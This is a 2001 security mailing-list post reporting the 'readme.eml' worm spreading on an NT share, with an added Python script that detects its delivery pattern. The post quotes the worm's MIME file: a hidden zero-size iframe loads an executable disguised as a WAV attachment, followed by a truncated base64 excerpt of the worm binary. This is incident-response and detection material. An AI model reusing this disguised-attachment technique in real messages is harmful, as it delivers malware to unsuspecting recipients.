Security Incidents mailing list archives
RE: New worm? 'readme.eml'
From: Mark Ng <hostmaster () qpp co uk>
Date: Tue, 18 Sep 2001 16:51:00 +0100
I've just seen this infest an NT share. I've isolated it to one drive (this machine is a fileserver with no access of its own to the internet). Following its behaviour further, this worm copies itself into available directories (I think using a client machine, as this is restricted to one drive that only one department has access to), naming itself the same as other files in that directory, except as a .eml. Upon opening in a text editor, the same content as described below by Pedro appears.
When I connected to the originating server (femm.tdkomm.com.br), I saw the normal web page for the institution, plus a pop-up window for http://femm.tdkomm.com.br/readme.DONT.eml (without "DONT"), as follows:

MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO
PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAH8AAAEAAAB/UEUAAEwBBQB1Oqc7
AAAAAAAAAADgAA4BCwEGAABwAAAAYAAAAAAAALN0AAAAEAAAAIAAAAAAFzYAEAAAABAAAAQAAAAA
... (worm code follows)

I've inspected the executable code, and it reads like a worm. (doh) Has anyone seen this?
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
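The readme.eml quoted above relies on two things a triage script can check mechanically: an HTML part carrying a zero-size iframe whose src is a cid: reference, and a sibling part whose declared Content-Type (audio/x-wav) does not match what the base64 actually decodes to (the quoted payload begins "TVqQ", i.e. the "MZ" header of a Windows executable, and the DOS stub string "This program cannot be run in DOS mode" is visible a few lines further on). The following Python is an added example written for this archive page, not code from anyone in the thread. It walks a message with the same MIME layout, resolves the iframe's cid to its part, and compares the declared type against the real magic bytes. The sample message is constructed for the example: its structure, boundaries and Content-ID copy the quoted readme.eml, but the base64 payload is a short stand-in that carries only the MZ/DOS-stub header, not the worm's code.

```python
"""Added example (not from the original thread): detect a hidden-iframe
cid: reference to a mislabelled executable part inside a .eml file."""

import base64
import email
import re
from email import policy

# Constructed stand-in for the worm body: just an MZ header and the DOS stub
# string, enough to exercise the magic-byte check.  Not the real payload.
STUB_PE = base64.b64encode(
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
    + b"\x00" * 40
    + b"This program cannot be run in DOS mode.\r\r\n$"
).decode()

# Constructed sample with the same MIME layout as the quoted readme.eml.
SAMPLE_EML = f"""MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

{STUB_PE}
--====_ABC1234567890DEF_====--
"""

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
CID_RE = re.compile(r"\bsrc\s*=\s*[\"']?cid:([^\s\"'>]+)", re.I)
ZERO_RE = re.compile(r"\b(?:height|width)\s*=\s*[\"']?0\b", re.I)


def sniff(data: bytes) -> str:
    """Guess a media type from magic bytes; 'unknown' if neither matches."""
    if data[:2] == b"MZ":
        return "application/x-msdownload"      # DOS/Windows executable
    if data[:4] == b"RIFF" and data[8:12] == b"WAVE":
        return "audio/x-wav"                   # a genuine WAV file
    return "unknown"


def analyse_eml(raw: str) -> list[dict]:
    """Return one finding per iframe cid: reference found in HTML parts."""
    msg = email.message_from_string(raw, policy=policy.default)
    parts_by_cid = {}
    refs = []  # (cid, iframe has height=0 or width=0)
    for part in msg.walk():
        if part.is_multipart():
            continue
        cid = str(part.get("Content-ID", "")).strip().strip("<>")
        if cid:
            parts_by_cid[cid] = part
        if part.get_content_type() == "text/html":
            # decode=True undoes the quoted-printable, so =3D becomes '='
            html = part.get_payload(decode=True).decode("iso-8859-1", "replace")
            for tag in IFRAME_RE.findall(html):
                m = CID_RE.search(tag)
                if m:
                    refs.append((m.group(1), bool(ZERO_RE.search(tag))))
    findings = []
    for cid, hidden in refs:
        target = parts_by_cid.get(cid)
        if target is None:
            findings.append({"cid": cid, "status": "dangling"})
            continue
        declared = target.get_content_type()
        actual = sniff(target.get_payload(decode=True))
        findings.append({
            "cid": cid,
            "hidden_iframe": hidden,
            "declared_type": declared,
            "actual_type": actual,
            "filename": target.get_filename(),
            "type_mismatch": actual != "unknown" and actual != declared,
        })
    return findings


def is_hidden_cid_executable(raw: str) -> bool:
    """True if a hidden iframe points at a part that is really an executable."""
    return any(
        f.get("hidden_iframe") and f.get("type_mismatch")
        and f["actual_type"] == "application/x-msdownload"
        for f in analyse_eml(raw)
    )


if __name__ == "__main__":
    for finding in analyse_eml(SAMPLE_EML):
        print(finding)
    print("hidden executable:", is_hidden_cid_executable(SAMPLE_EML))
```

To run it against a real readme.eml pulled off a share, read the file as text and pass it to analyse_eml; the file only needs the complete base64 part, which the quote above truncates. The declared-type check is deliberately narrow (MZ and RIFF/WAVE only) so that an unknown payload is reported as such rather than as a mismatch.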
Current thread:
- New worm? 'readme.eml' Pedro Miller Rabinovitch (Sep 18)
- Re: New worm? 'readme.eml' Christopher X. Candreva (Sep 18)
- Re: New worm? 'readme.eml' Tony Abedini (Sep 18)
- <Possible follow-ups>
- Re: New worm? 'readme.eml' coop (Sep 18)
- RE: New worm? 'readme.eml' Mark Ng (Sep 18)
- Re: New worm? 'readme.eml' Christopher X. Candreva (Sep 18)